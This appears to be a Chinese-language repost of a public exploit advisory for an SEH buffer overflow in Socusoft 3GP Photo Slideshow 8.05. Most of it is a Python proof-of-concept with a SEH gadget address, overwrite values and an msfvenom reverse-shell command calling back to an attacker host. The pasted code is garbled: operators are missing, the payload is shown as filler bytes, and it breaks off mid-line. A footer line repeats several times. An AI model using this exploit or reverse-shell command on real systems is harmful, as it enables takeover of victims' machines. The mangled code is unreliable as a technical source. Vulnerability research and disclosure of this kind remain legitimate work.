Socusoft 3GP Photo Slideshow 8.05 SEH缓冲区溢出漏洞及POC

漏洞总结：Socusoft 3GP Photo Slideshow 8.05 缓冲区溢出 (SEH) 漏洞概述 漏洞类型：缓冲区溢出 (Buffer Overflow) - SEH (Structured Exception Handling) EDB-ID：45352 发布日期：2018-09-10 作者：Shubham Singh (Spirited Wolf) 利用方式：本地 (Local) 受影响软件：Socusoft 3GP Photo Slideshow 受影响版本：8.05 影响范围 操作系统：Windows XP Service Pack 3 x86 平台：Windows_x86_64 (注：页面显示为x86_64，但测试环境为x86，通常此类漏洞针对32位应用) 修复方案 页面未提供具体的补丁链接或厂商修复建议。 建议用户升级至最新安全版本或联系厂商获取更新。 临时缓解措施：避免打开恶意构造的 文件。 利用代码 (POC) ```python Exploit Title: Socusoft 3GP Photo Slideshow 8.05 - Buffer Overflow (SEH) Date: 2018-09-08 Author: Shubham Singh Known As: Spirited Wolf [Twitter: @Pwescpirit] Software Link:http://www.dvd-photo-slideshow.com/3gp-photo-slideshow.html Tested Version: 8.05 Tested on OS: Windows XP Service Pack 3 x86 Steps to Reproduce: 1. Run the python exploit script, it will create a new file with the name "exploit.txt". 2. Just copy the text inside "exploit.txt". 3. Start the program. In the new window click "Help" > "Register ... 4. Now paste the content of "exploit.txt" into the field: "Registration Name" + "Registration Key". Click "Apply" > "Ok" You will see a sweet reverse shell popped up in your attacker box. buffer = "A" (512) 0x1003802d : pop ebx ; pop ecx ; ret ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.5.0 ( C:\Program Files\Socusoft\Socusoft 3GP Photo Slideshow\DVDPhotoData.dll) nseh = "\x2d\x80\x03\x10" seh = "\x2d\x80\x03\x10" nops = "\x90" 10 #msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5 LPORT=1337 -b '\x00\x0a\x0d' -f python buf = "" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

Socusoft 3GP Photo Slideshow 8.05 SEH缓冲区溢出漏洞及POC

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

Socusoft 3GP Photo Slideshow 8.05 SEH缓冲区溢出漏洞及POC

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！